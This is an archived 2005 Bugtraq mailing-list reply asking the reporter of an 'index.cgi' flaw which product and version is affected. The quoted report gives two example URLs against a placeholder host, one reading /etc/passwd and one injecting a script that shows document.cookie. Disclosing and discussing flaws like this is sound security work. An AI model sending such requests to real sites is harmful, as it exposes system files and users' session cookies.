Re: index.cgi script XSS + file show

From: D.C. van Moolenbroek (xanadu_at_chello.nl)
Date: 04/25/05

  • Next message: Martin Schulze: "[SECURITY] [DSA 714-1] New kdelibs packages fix arbitrary code execution"
    To: <bugtraq@securityfocus.com>
    Date: Mon, 25 Apr 2005 22:22:34 +0200
    
    

    Could you please provide some more specific information regarding the
    bugs you have found? For example, a simple google query for
    "inurl:index.cgi" yields over two million results, and I seriously doubt
    that those are all vulnerable - which product(s) are we talking about
    here, and which version(s)? This information would greatly enhance the
    ability of those who are either writing or using the vulnerable
    software, to deal with the problem..

    Kind regards,
    David van Moolenbroek

    "fireboy fireboy" wrote:
    >
    >
    > Tunis 24/04/2005
    > BUG found by fireboy
    > fireboy@webmails.com
    >
    >
    >
    > THERE ARE SOME BUGS IN index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES
    IN A SYSTEM
    >
    > IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE
    >
    >
    >
    > 1)file showing
    > http://www.target.com/index.cgi?/etc/passwd
    >
    >
    > 2)CSS
    >
    http://www.target.com/index.cgi?&lt;script&gt;alert(document.cookie)&lt;
    /script&gt;
    >
    >
    > greetz to all magattack members www.magattack.tk


  • Next message: Martin Schulze: "[SECURITY] [DSA 714-1] New kdelibs packages fix arbitrary code execution"